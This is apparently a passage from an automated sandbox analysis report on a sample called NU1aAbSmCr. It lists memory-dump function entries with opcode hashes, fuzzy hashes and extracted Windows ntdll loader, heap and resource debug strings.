                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: 29a502374bb8e4595265a6dcdfdd28cfc8944a2deaea5ec9bec42be052d81f15
                                                      • Instruction ID: ae0f8125a869d6e12aafd7f5d587b22727661f617763eac4ae6e3dc12d011a9b
                                                      • Opcode Fuzzy Hash: 29a502374bb8e4595265a6dcdfdd28cfc8944a2deaea5ec9bec42be052d81f15
                                                      • Instruction Fuzzy Hash: 99410231A006498FEB26DBD9DC48BADBBB9FF95340F14045ADA11EF791DB358901CB10
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01664899
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01664888
                                                      • LdrpCheckRedirection, xrefs: 0166488F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                                                      • Instruction ID: 3f32c0e1e4fbdbfc9568f0a73c85dba48647fb69d96aeff8c652237d210d989a
                                                      • Opcode Fuzzy Hash: 77667a52d25004895360b74f5f7420ccd157d5c5826d79f5a8d8ea61e0d039db
                                                      • Instruction Fuzzy Hash: CE41D132A056519FCB21CE6CDD40A66BFEDBF8AA90F06056DED49DB351DB30E810CB91
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      • Opcode ID: 98137fd8dbcaed7430a45e0dec2b4229c355be35b74d6953419ff7efcafecf9a
                                                      • Instruction ID: edec4bd886d69d717e68050bf911d0c08b41dd24faff41bc7178fd3516b5807f
                                                      • Opcode Fuzzy Hash: 98137fd8dbcaed7430a45e0dec2b4229c355be35b74d6953419ff7efcafecf9a
                                                      • Instruction Fuzzy Hash: 5411CD313161469FDB29DB18C880B6AB3A6BF41716F18811EF506CF292DB34D841C755
                                                      Strings
                                                      • LdrpInitializationFailure, xrefs: 016620FA
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01662104
                                                      • Process initialization failed with status 0x%08lx, xrefs: 016620F3
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: 0eebcae3bbd4cc579519f9c5b36a75e800991c482bdf7f0e8967108b138fcb97
                                                      • Instruction ID: d9082f9d4f9c2188f169eb67b4e6f25619514b0ed4b71c8f4e23aefca54c6ea5
                                                      • Opcode Fuzzy Hash: 0eebcae3bbd4cc579519f9c5b36a75e800991c482bdf7f0e8967108b138fcb97
                                                      • Instruction Fuzzy Hash: BBF02274A40708AFE724EA8CCC56FAA776DFB40B04F10002CFB007B781D3B0A950CA85
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: 3ae29b5f43475a23d5456f818ff08b8298617ecd7366ad7d44513613fc9885bd
                                                      • Instruction ID: 7bd550ca02dab0cc54ba21c4ad67ac2d668612d22a00aee80e8b1aa4a079c537
                                                      • Opcode Fuzzy Hash: 3ae29b5f43475a23d5456f818ff08b8298617ecd7366ad7d44513613fc9885bd
                                                      • Instruction Fuzzy Hash: A1713B71A0014A9FDB01DFA8CD95BAEB7F9BF48744F144069EA05EB291EB34ED01CB64
                                                      Strings
                                                      • LdrResSearchResource Exit, xrefs: 015EAA25
                                                      • LdrResSearchResource Enter, xrefs: 015EAA13
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      • Opcode ID: 78bd5bad2d1a025b74a95886f6705c0cc35b603d961758d1ac68e3a7bcf0ec20
                                                      • Instruction ID: b7e6b71722a7ba112a3138e17513a0d6fb45970f523017c4f68417e1c90aa102
                                                      • Opcode Fuzzy Hash: 78bd5bad2d1a025b74a95886f6705c0cc35b603d961758d1ac68e3a7bcf0ec20
                                                      • Instruction Fuzzy Hash: ECE17071E002199BEF268FA9DD88BAEBBF9BF54310F104529F901EB351D7749941CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction ID: a698c2c5862afa5a4a5d6c68120d0806c8aee6c4c55a1dfe6510da5f284cc184
                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction Fuzzy Hash: 7EC1BE312043429BE725CF68CC41B6BBBE6AFC4318F484A2EF6968B291D774D905CF55
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 6ff4604b60a1b9b26c718f1416920137afbb5519c000328c03058dc0b669530c
                                                      • Instruction ID: fab33ac51e98d38f9c8150a5bc9c232732f845c3be453a0f92c2bf6239fbf219
                                                      • Opcode Fuzzy Hash: 6ff4604b60a1b9b26c718f1416920137afbb5519c000328c03058dc0b669530c
                                                      • Instruction Fuzzy Hash: 45616C72E006199FDF54DFA88D80BADFBB5FB48700F15406EEA49EB241D732AA00CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      • Opcode ID: bf0ed8d15235f81f2f4f51612c9f9d980436b485a5375accca91b1209a5b7cf9
                                                      • Instruction ID: 5d3890d03d3bf9ab7bfa470e6e4366a162db0a8575b38d4b5b8aec26540c485f
                                                      • Opcode Fuzzy Hash: bf0ed8d15235f81f2f4f51612c9f9d980436b485a5375accca91b1209a5b7cf9
                                                      • Instruction Fuzzy Hash: B051F771E4061EAEDF11DFA9CC90BEEBBB9FB58754F100629E611B7290DB309905CB60
                                                      Strings
                                                      • kLsE, xrefs: 015E0540
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 015E063D
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      • Opcode ID: 0d9a80e11528e64fa055cdaf855a6463cee4ed8f5993f5ac7de1e28c6dbcd953
                                                      • Instruction ID: 5f70e8b770cf9fda9721c06aa55b128ff9609da5bce332dea9a4654e61df063f
                                                      • Opcode Fuzzy Hash: 0d9a80e11528e64fa055cdaf855a6463cee4ed8f5993f5ac7de1e28c6dbcd953
                                                      • Instruction Fuzzy Hash: 1951A171A047429BD728DF68C4487A7B7E4BF84304F10483EE5DA8B281E7B0D545CF91
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 015EA309
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 015EA2FB
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      • Opcode ID: 4a3aa21c822c701ea33b33b2bd36c9b4003dcaf4de08a1c9eca4aeee17a67ebe
                                                      • Instruction ID: 588feb8dce0be5d4cfe5c92a5275bf9e022bae34ccc90e30ce76bb6ee31257d4
                                                      • Opcode Fuzzy Hash: 4a3aa21c822c701ea33b33b2bd36c9b4003dcaf4de08a1c9eca4aeee17a67ebe
                                                      • Instruction Fuzzy Hash: 07419930A00646DBEB19CF69D894B6ABBF4BF88304F2444A9E914DF391E3B5D900CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      • Opcode ID: 29068fbe04ff6f1c0c96588e75589d5719f72b1e609a3be41ce65f33098fde6c
                                                      • Instruction ID: 28a8472b74ada99cd9dafe54866eed19cf896df9be8f522fead069b3a40b4dd5
                                                      • Opcode Fuzzy Hash: 29068fbe04ff6f1c0c96588e75589d5719f72b1e609a3be41ce65f33098fde6c
                                                      • Instruction Fuzzy Hash: A70121B2215780AFD311CF54CD45B1677E8E784725F08883DE608CB180E370E800CB8A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: 82d7dbb86b9363305b4e0baaba3a1bafefcee2af49c6e2ffd67228dbacf2d492
                                                      • Instruction ID: ea8d2245197a0a4b8cb89f8cda163a957709eb4a2c61efeabba538fc318dbc9e
                                                      • Opcode Fuzzy Hash: 82d7dbb86b9363305b4e0baaba3a1bafefcee2af49c6e2ffd67228dbacf2d492
                                                      • Instruction Fuzzy Hash: 12826975E002198FEB29CFA9C988BEDBBF5BF48310F148169E919AF390D7709941CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: c81a61c96b46af231eb3949a5e1ba489ffa365e84bc87adb7d995f8cfb8e098d
                                                      • Instruction ID: 74193e67bd0a75c1f3bb65795b744327bd47bab3c6542fdf93d503cb6f69753c
                                                      • Opcode Fuzzy Hash: c81a61c96b46af231eb3949a5e1ba489ffa365e84bc87adb7d995f8cfb8e098d
                                                      • Instruction Fuzzy Hash: 14918371A0061AAFEB25DF95DC85FAEBBB9EF48750F100059F600AB290D774AD00CBA4
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: b37fef2207ecf65e6a8bf88dd5df178d830876dddc23eb133c21543347899400
                                                      • Instruction ID: 2a762aa1f0299d6bf19c1c64b289334228824b9d1481583099bbd7e18553bb20
                                                      • Opcode Fuzzy Hash: b37fef2207ecf65e6a8bf88dd5df178d830876dddc23eb133c21543347899400
                                                      • Instruction Fuzzy Hash: 0191A13190161ABFDB22AFA5DC54FAFBB7AFF85750F100129F601A7250DB769902CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: d622fb05402c001f5565d46ccede13ef190a2324a3c2e069c1b161ebe5b47d70
                                                      • Instruction ID: 9e43fd968f3b38f26805cb1c028017beb5a2eb1d83f0f34816599cfcf0873f68
                                                      • Opcode Fuzzy Hash: d622fb05402c001f5565d46ccede13ef190a2324a3c2e069c1b161ebe5b47d70
                                                      • Instruction Fuzzy Hash: 37716EB5E0021A9FDF68CF9CD9906ADBBB2BF48710F54816EE906A7341E7309941CB64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      • Opcode ID: f45c569fe08073ea61e672979d7db9322961094cf621b9a02078f797f0cc20a6
                                                      • Instruction ID: ea22d83d5b9948412ec1bb8ff19b2b0f2ee4f38414ed7e68e7211f989f67d399
                                                      • Opcode Fuzzy Hash: f45c569fe08073ea61e672979d7db9322961094cf621b9a02078f797f0cc20a6
                                                      • Instruction Fuzzy Hash: EE517372D00227DBDB14EF99DC44BAEBBB4BF54A14F05426AE911BB344DB349801CBA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: dca05a85d87ff682b0a018ec3dabf4c538790d2aa533efead76819117e0c69b5
                                                      • Instruction ID: e40c00b5accbe056d58f4fb6636a3f8233e5cc5ea235071c0c2c09c056ab08bb
                                                      • Opcode Fuzzy Hash: dca05a85d87ff682b0a018ec3dabf4c538790d2aa533efead76819117e0c69b5
                                                      • Instruction Fuzzy Hash: 67418F725093429BD721DA69C881B6FBBE8FF88714F05092DFA84EB190E674D904C796
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: b885ef73176134d5f7d5426f2a9b816b29479028ead5de513a8ef93f01add986
                                                      • Instruction ID: be9b5ba05b3aa4a01af1978532e7c72df404598f09ecc18bf589a78dda2e6169
                                                      • Opcode Fuzzy Hash: b885ef73176134d5f7d5426f2a9b816b29479028ead5de513a8ef93f01add986
                                                      • Instruction Fuzzy Hash: BF4145B1D0062DAADB61DA50CC84FDEBB7DAB45714F0145E9EA08AB140DB709E89CF98
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 5fa72bfc109f8a930add28f78caee9d284509800d4c0708cc63939daef4078e2
                                                      • Instruction ID: 95c938db31272f0ff3c062d5cc87de7dd514c3d63dc11f7132eb55d1ee213913
                                                      • Opcode Fuzzy Hash: 5fa72bfc109f8a930add28f78caee9d284509800d4c0708cc63939daef4078e2
                                                      • Instruction Fuzzy Hash: 9C31F431E00B199AFB22DB69CC50BEE7BA8EF45704F14406CEA41AB282DB75D845CB54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: 86b5cad2ba512d7d9147c454c1b38d16364b342da05156b2e287eaadb7ab954d
                                                      • Instruction ID: 7b73bf7b50ea60f5dd78ab7441efd0810a16626dba306ec77fbb23b5e5b13882
                                                      • Opcode Fuzzy Hash: 86b5cad2ba512d7d9147c454c1b38d16364b342da05156b2e287eaadb7ab954d
                                                      • Instruction Fuzzy Hash: 2631F53690061AAFEB15DB59CC55E6FBB78EF80720F014169ED05AB250D7309E04DBE0
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0166895E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      • Opcode ID: e0d0be358e7ab3ddd5cbcf53c628fdae525fdd80439d6d5c0929d806cdbbd25d
                                                      • Instruction ID: 390a3da6c22c826e811ae8f2090ce64c312b418078e1697920118b828a05dd09
                                                      • Opcode Fuzzy Hash: e0d0be358e7ab3ddd5cbcf53c628fdae525fdd80439d6d5c0929d806cdbbd25d
                                                      • Instruction Fuzzy Hash: CB01F731A11302AFE7345F7DCC84A567B6DFFD5695B04121CF64207651CB606845C796
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7de50df338917808d594de811c01b2f4d12b07204027c8cadf23585278df154
                                                      • Instruction ID: d7607d9bcd57a3d8ee54f91dc5f92c65868d584ecac707ddb12a2dd6e720d297
                                                      • Opcode Fuzzy Hash: a7de50df338917808d594de811c01b2f4d12b07204027c8cadf23585278df154
                                                      • Instruction Fuzzy Hash: 8442D2716083419FDB25EF68CCA0A6BBBE5BF88700F594A2DFA8297350D770D845CB52
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 151ac685530c493c5b7e0341a6d8a8b0902380ee285330a0aabbf87aee957bd6
                                                      • Instruction ID: 169677a04672e7e3b064d61c524ecb7ee86626459c967f6b48272bf66c61c3e1
                                                      • Opcode Fuzzy Hash: 151ac685530c493c5b7e0341a6d8a8b0902380ee285330a0aabbf87aee957bd6
                                                      • Instruction Fuzzy Hash: 2A425C71E002199FEB25CF69CC45BADBBF9BF88310F158099E949AB242D7349D81CF50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2032621169ac28149090f07757d627277775bb57faad19ef42f957c73c3946a
                                                      • Instruction ID: e42e0bedc694bf2b16e5ef3550ff83e99b02623c275d8bc0686409d8a4cf059d
                                                      • Opcode Fuzzy Hash: c2032621169ac28149090f07757d627277775bb57faad19ef42f957c73c3946a
                                                      • Instruction Fuzzy Hash: 9632BAB0A006568FEB29CF69CC447BEBBF2BF86304F24811DD5869B785D735A842CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 837b4430c3e538ebe26902c3573c4df6517218bdae45b12b18c1360b7e3c36a3
                                                      • Instruction ID: e026c2fc2e2c7d5dc1a3bea71a7f3f58011435476769fe6eb5832c7af19df7df
                                                      • Opcode Fuzzy Hash: 837b4430c3e538ebe26902c3573c4df6517218bdae45b12b18c1360b7e3c36a3
                                                      • Instruction Fuzzy Hash: EA22C1742046618BEB25EFADC850372BBF1AF44304F08865BDD868F386E775E492DB61
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1a1cc927fdab34a1ce08c93c261e9ecb1ac4fc5c88004046acee0c495235b070
                                                      • Instruction ID: 28eae9194aed1cef20b39661661fc30a0505afd59166cad6acac8faff8ab260a
                                                      • Opcode Fuzzy Hash: 1a1cc927fdab34a1ce08c93c261e9ecb1ac4fc5c88004046acee0c495235b070
                                                      • Instruction Fuzzy Hash: E4328C71E01215CFDB29CF68C884AAEBBF2FF58310F148569E956AB391D774E881CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction ID: 5c4c56cfe57d665fe94ac5b3ecb6d9de61cb5e70be7d5531a6dbdd941e0a292d
                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction Fuzzy Hash: 5BF15371E0061A9FDB2ACF99DD40BAFBBF5AF48710F058169EA05AB380DB74D841CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26af40b0e919853e95b472f6da6670430bcd1ad82b6324fa625d98c8fe9cc782
                                                      • Instruction ID: 3709ea602661821bb282fe0cdc915585eb97121502fb2d317489392d5b0c2730
                                                      • Opcode Fuzzy Hash: 26af40b0e919853e95b472f6da6670430bcd1ad82b6324fa625d98c8fe9cc782
                                                      • Instruction Fuzzy Hash: 89D1E271E0060A8BDF15CF69CC45ABEBBFABF88304F188169D955A7241D735ED06CB60
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e5bba8e54da128d24634b15718b41f6ef4d51e261ff8027fd6d56edbe0855ae
                                                      • Instruction ID: 184456b348ba0b160812e0ab5eceab0431070bfcef96f18cc16644fc1a3e091c
                                                      • Opcode Fuzzy Hash: 1e5bba8e54da128d24634b15718b41f6ef4d51e261ff8027fd6d56edbe0855ae
                                                      • Instruction Fuzzy Hash: B6E1C071A08342CFC719CF28C494A6ABBE0FF99354F05896DE9958B351DB30E905CF92
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa0c28c477560cd11a864fafe71e6aea37bbb1572bf15e414b725da80bf163a6
                                                      • Instruction ID: d8233bcf290684f1a189b2fed82ef0f1ab93ab7c8e01657433ef8b4bb48f848d
                                                      • Opcode Fuzzy Hash: fa0c28c477560cd11a864fafe71e6aea37bbb1572bf15e414b725da80bf163a6
                                                      • Instruction Fuzzy Hash: A3D1BD71A006169BDB24DF6CCC91ABEB7E5FF94318F05462DE9169F281EB30E950CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction ID: 2780f118625059ec638a1056b39e6539ff7cd2bd3788c4de63274f79467993a3
                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction Fuzzy Hash: 16B15075A00705AFDF24DBA9CD40AABBBBEBF84304F14845DEA02A7794DB34E905CB50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1821551688.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_15b0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: 8028af8b3d26ab491e9009ed558219a741051b32bc36a9e38c9bef9433c59222
